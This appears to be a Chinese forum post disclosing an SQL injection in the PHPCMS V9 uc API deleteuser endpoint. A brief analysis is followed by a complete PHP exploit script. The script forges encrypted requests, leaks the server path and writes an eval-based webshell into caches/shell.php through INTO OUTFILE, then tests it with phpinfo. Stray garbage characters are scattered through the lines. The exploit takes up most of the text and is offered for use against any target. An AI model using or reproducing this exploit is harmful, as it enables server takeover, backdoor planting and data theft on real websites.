PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
. |& d% }3 D6 P" u
# @4 q9 G) _* g5 l6 }所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。
3 M; m* d3 S( J
漏洞分析：
) f6 \( o# s) g  J1.未启用ucenter服务的情况下uc_key为空
# H2 h: }4 B9 p5 s( j* edefine('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
7 k5 H' b: n5 F1 q! h* h; S    public function deleteuser($get,$post) {
" D$ D$ n9 }5 G8 e        pc_base::load_app_func('global', 'admin');
" e+ d* f- u6 o$ Y: Q# B, }3 Q7 c        pc_base::load_app_class('messagequeue', 'admin' , 0);
6 Y+ j  M0 {- e) e# f% Z/ p        $ids = new_stripslashes($get['ids']);
        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
$ X& E& N  }, D  N! ESQL语句为
" g( s& Z  Y' l# p0 ?SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
2 h/ L: h+ a. f; g) [$ w
/ t( @/ {! L' m/ m1 D  L利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
; n" o* s8 A9 e<?php
$ K8 O' y1 h. o, u' Eprint_r('
& Q4 F" f0 u2 N' W---------------------------------------------------------------------------
PHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
  M# F7 N6 [" ~& S( g6 r' h- x---------------------------------------------------------------------------
');

( S4 e- b' t$ B, p4 w& C- C4 bif ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
/ z( k& S1 W$ Q* G$ T. R  Ihost:      target server (ip/hostname)
7 n  A; |) Q) E" C6 f1 opath:      path to phpcms
Options:
-p[port]:    specify a port other than 80
: t/ y# v. E" E7 B. N3 ^ -P[ip:port]: specify a proxy
Example:
! n) O0 P6 t( K% c" O( zphp '.$argv[0].' localhost /
% d9 y; u7 f) a$ V- s" Q& Aphp '.$argv[0].' localhost /phpcms/ -p81
* `: h0 m  O8 M  h4 d( z2 H1 \php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
. @0 ~- M7 C' H---------------------------------------------------------------------------
');
    die;
. e1 ^5 b9 j) b) U" Z. i}

error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
; {+ e3 ?* f" ?" f5 S5 \   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
- z2 S: s' C* e) q, B6 E   else
" F! z9 e0 g: N$ y6 r* U) _- H   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
3 e4 C2 x  i0 U+ I7 t   {$exa.=" ".dechex(ord($string[$i]));}
   else
: G6 n) o1 z5 k4 u, `# q  P   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
, I* X" j) _0 q1 p, u- N}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
9 Q3 P) y9 V) H% U5 \
, |$ ?: y- Z% j2 ^5 Afunction send($packet)
: e& A& C  r8 e# Y3 a+ ^7 z: r" Z{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
" z" F7 p4 X% @) c4 F* B2 B+ x    $ock=fsockopen(gethostbyname($host),$port);
& ^9 o* V! A  ~4 r    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
3 `" `8 m3 D/ ^3 x. |4 A    }
/ j0 o( p# H; X& ]  }
. T9 \+ X8 P5 B0 m( f1 c- C  else {
! h  o3 ~; z. i# \$ \        $c = preg_match($proxy_regex,$proxy);
% e& i' u9 {3 V) j- y    if (!$c) {
! w6 K% d2 B. u& \      echo 'Not a valid proxy...';die;
7 q0 Y& f  k: a    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  G5 }! K8 C4 d    $ock=fsockopen($parts[0],$parts[1]);
- }2 ]  ~" w, ?3 `1 X    if (!$ock) {
      echo 'No response from proxy...';die;
        }
- k% x& A' z; {# |- C  }
- f; }% X1 X& c9 G  fputs($ock,$packet);
2 H; T1 s- L- a2 {: \% G6 o  if ($proxy=='') {
/ h* W' M' u5 U    $html='';
    while (!feof($ock)) {
3 _7 N; |- v( _2 i      $html.=fgets($ock);
0 F7 `& o! _" _. y; ?) d! V    }
  Q1 F( T  g: g2 z+ Z8 `& R  }
  else {
    $html='';
9 o" L, B* P5 h    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

- l6 j1 i2 v( ?+ g8 X- C$host=$argv[1];
7 L4 Y) a, d# [$path=$argv[2];
- Z( C4 g; ~+ x4 }8 c) v$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
* {. o  b$ r5 U2 X- u; ^" |# J" v) ]3 sif ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
6 B# J# g. C) t6 L}
/ X, w; }: l% \if ($temp=="-P")
{
; }+ r: A8 r# h/ o  $proxy=str_replace("-P","",$argv[$i]);
/ m7 R2 g8 [" V' J}
% L% n3 e$ C6 X5 F* F1 Z# h$ ^}
% R; I2 q: D- e
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

# e8 H5 F, ]1 k! W    $ckey_length = 4;

    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
& J- ~- Z: }: p! q6 V    $keyb = md5(substr($key, 16, 16));
9 X; o+ O: ?0 m    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
% ]+ v/ y  V0 x/ y5 h$ v
% w2 M4 T4 d' J8 X3 o2 w    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

# l* G. N/ E- Y    $rndkey = array();
) B0 ~: `9 b& k. T+ m- p    for($i = 0; $i <= 255; $i++) {
  a$ D# @- z; z6 e) x" E. ~. i7 p        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
- [8 o6 c) L' L) v
# A$ {% h3 f7 G; n( j: Y    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
8 l$ r0 V" D& S& U        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
+ [& H( c  r: d8 i6 ]. m; y" ~        $a = ($a + 1) % 256;
4 H/ L7 X6 i" x" }2 P. i  m/ i1 x9 m1 F+ c        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
, K. o; Z) ]. }        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

) Q' ^  P8 v) G+ z& k    if($operation == 'DECODE') {
1 N4 Z- w! w6 ^% M2 g' E% |6 U        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
" o* T5 N* P  ^- L5 u% o; j2 P    }

}

8 q7 {! {" ?3 l7 N$ P! g/ ^! P$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
3 h* T1 @3 w: [! R* \  j# t8 ?$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
( }) a5 @+ D6 ], s$ p5 {) t, asend($packet);
if(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
! i) `* H& A+ R1 n& E# h( u3 Decho "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
+ f- X( W+ E/ j* j* o( z+ X$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
! p  T! u8 q" K4 O$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
9 k( O3 H$ A8 w$ ]if(!empty($matches)){
% V2 n6 J, p1 j$ X* @3 qecho "[4] 得到web路径 " . $matches[0]."\n";
/ F0 \( ^& ~( n5 Uecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
$SQL = "time=999999999999999999999999&ids=1)";
9 O& s" E, t8 K$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
$SQL.="&action=deleteuser";
8 s: r% p+ g5 q2 V. J5 A  @. U3 I$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$ ~; N  u6 Z2 R" B- _6 m" G$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
. G: F/ O+ N4 S9 Z9 C! [$ R$packet.="Connection: Close\r\n\r\n";
( B$ t6 X7 Q8 }# Z3 F: u9 {send($packet);
if(strpos($html,"Access denied") > 0){
echo "[-] MYSQL权限过低 禁止写入文件 ";
" e* K' w: O0 _# z0 i2 [die;
}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
/ t1 U: ?! u/ D2 {4 H$ C+ w  w$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
! B& ?0 J* A! N: S7 V. s$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
0 x1 ^( w! K. b  Jif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
" o  k3 x6 m5 e# C. W4 M}
}else{
% O" h: e3 ]8 ~3 _3 H) z; decho "[-]未取到web路径 ";
}
1 O* M2 ~7 A. Q2 B1 W4 ?}else{
& ?8 z, D' F2 a, d0 ~$ Lecho "[*]不存在SQL注入漏洞"."\n";
/ m+ {; ^; z3 u6 n) n}
, p2 t8 b2 k2 h- v+ W
?>
' w, H; O' w8 y4 K) h2 l